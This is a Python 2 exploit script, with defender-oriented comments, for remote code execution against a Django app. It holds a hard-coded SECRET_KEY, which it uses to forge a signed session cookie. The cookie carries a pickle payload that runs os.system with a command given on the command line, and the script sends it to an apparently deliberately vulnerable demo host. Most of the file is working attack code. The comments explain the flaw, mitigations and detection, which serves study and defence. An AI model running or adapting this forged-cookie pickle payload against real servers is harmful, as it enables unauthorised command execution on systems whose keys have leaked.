- # coding: UTF-8
- # Written by Orange@chroot.org
- #
- import sys
- import hmac
- import time
- import hashlib
- import base64
- from random import randint
- import requests
# Endpoint the request at the bottom of the script is sent to (the host name
# suggests a deliberately vulnerable demo application).
URL = "http://vuln-django.orange.tw/"
# Django SECRET_KEY of that application, hard-coded. It is the only secret
# that goes into the cookie signature computed below, so anyone holding it
# can mint cookies the server will accept as authentic. A SECRET_KEY that has
# leaked (source repo, debug page, backup) has to be rotated, not just hidden.
SECRET_KEY = "1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk"
# Salt mixed into the HMAC key; the string is the module path of Django's
# signed-cookie session backend.
SALT = "django.contrib.sessions.backends.signed_cookies"
def salted_hmac(key_salt, value, secret=None):
    """Build an HMAC-SHA1 object over ``value``.

    The HMAC key is the SHA-1 digest of ``key_salt + secret`` (UTF-8 encoded),
    so the result is reproducible by anyone who knows ``secret``; the salt is
    not secret and only separates one use of the key from another.

    Returns the ``hmac`` object itself; callers take ``.digest()`` from it.
    """
    key_material = (key_salt + secret).encode('utf-8')
    derived_key = hashlib.sha1(key_material).digest()
    message = force_bytes(value)
    return hmac.new(derived_key, msg=message, digestmod=hashlib.sha1)
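def b64_encode(s):
    """Return the URL-safe base64 encoding of bytes ``s`` without ``=`` padding.

    This is the unpadded form used for both the cookie body and its signature
    in this script.
    """
    return base64.urlsafe_b64encode(s).strip(b'=')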
def base64_hmac(salt, value, key):
    """Return the unpadded URL-safe base64 of the salted HMAC of ``value``.

    ``salt`` and ``key`` are passed to ``salted_hmac`` as its key salt and
    secret; the raw digest is then encoded with ``b64_encode``.
    """
    mac = salted_hmac(salt, value, key)
    raw_digest = mac.digest()
    return b64_encode(raw_digest)
def force_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
    """Coerce ``s`` to a byte string in ``encoding``.

    Bytes input is returned unchanged for UTF-8 and re-encoded (via a UTF-8
    decode) for any other encoding. With ``strings_only`` set, ``None`` and
    ints are returned as they are.

    NOTE(review): the remaining branches reference ``Promise`` and ``six``,
    neither of which appears in this script's import list, so any input that
    gets past the first two checks raises NameError at the ``Promise`` test.
    The function looks like a copy of a framework helper; confirm where those
    names are meant to come from before relying on the non-bytes paths.
    """
    # Fast path: already bytes.
    if isinstance(s, bytes):
        if encoding == 'utf-8':
            return s
        else:
            return s.decode('utf-8', errors).encode(encoding, errors)
    if strings_only and (s is None or isinstance(s, int)):
        return s
    if isinstance(s, Promise):
        return six.text_type(s).encode(encoding, errors)
    if not isinstance(s, six.string_types):
        # Non-string object: convert through its text (or bytes) representation.
        try:
            if six.PY3:
                return six.text_type(s).encode(encoding)
            else:
                return bytes(s)
        except UnicodeEncodeError:
            if isinstance(s, Exception):
                # Encode each element of the exception separately and join
                # the pieces with spaces instead of raising again.
                return b' '.join([force_bytes(arg, encoding, strings_only,
                                              errors) for arg in s])
            return six.text_type(s).encode(encoding, errors)
    else:
        return s.encode(encoding, errors)
# Alias: this script uses force_str as another name for force_bytes.
force_str = force_bytes
class Exploit:
    """Pairs a signing key with a salt and computes cookie signatures.

    The class holds no other state; its one operation reproduces the
    signature a server would compute with the same key and salt, which is
    why possession of the key is equivalent to being able to sign.
    """

    def __init__(self, key, salt):
        """Store the signing ``key`` and the ``salt`` for later use."""
        self.key, self.salt = key, salt

    def signature(self, value):
        """Return the signature of ``value`` as produced by ``base64_hmac``.

        The HMAC salt is the stored salt with the literal ``'signer'``
        appended; the result is passed through ``force_str``.
        """
        signer_salt = self.salt + 'signer'
        encoded_mac = base64_hmac(signer_salt, value, self.key)
        return force_str(encoded_mac)
# Script entry point. Python 2 only: it uses the print statement and
# %-formatting on a bytes literal.
#
# What the script demonstrates, from the defender's side: the session cookie
# it sends carries a pickle stream instead of session data, signed with the
# application's own SECRET_KEY. A signed-cookie session backend only proves
# that the cookie was made by someone holding the key; if the key is known
# and the session serializer is pickle, verifying the signature is followed
# by unpickling client-supplied bytes.
#
# Mitigations: keep SESSION_SERIALIZER on the JSON serializer (Django's
# default since 1.6; PickleSerializer was removed in Django 5.0), never commit
# or expose SECRET_KEY, and rotate it after any suspected disclosure.
if __name__ == '__main__':
    if len( sys.argv ) < 2:
        print 'Usage: python rce.py command'
        exit()
    cmd = sys.argv[1]
    # Hand-written protocol-0 pickle: a global reference to os.system applied
    # to the command-line argument. pickle treats its input as instructions,
    # which is why it must not be used on data a client can supply.
    payload = b"cos\nsystem\n(S'%s'\ntR." % cmd
    # Cookie body: unpadded base64 of the pickle, a colon, then the current
    # Unix time as an integer.
    payload = '%s:%d' % (b64_encode( payload ), time.time() )
    # Signature over the body, computed locally from the hard-coded key and
    # salt; no interaction with the server is needed to produce it.
    sig = Exploit(SECRET_KEY, SALT).signature( payload )
    headers = { 'Cookie': 'sessionid="%s:%s";' % (payload, sig) }
    # A random integer is appended as the query string (presumably to avoid
    # cached responses); the response itself is discarded.
    # Detection hint: a sessionid whose first segment base64-decodes to pickle
    # opcodes rather than serialized session data is worth alerting on.
    url = '%s?%d' % ( URL, randint(0, 65535) )
    requests.get( url, headers=headers )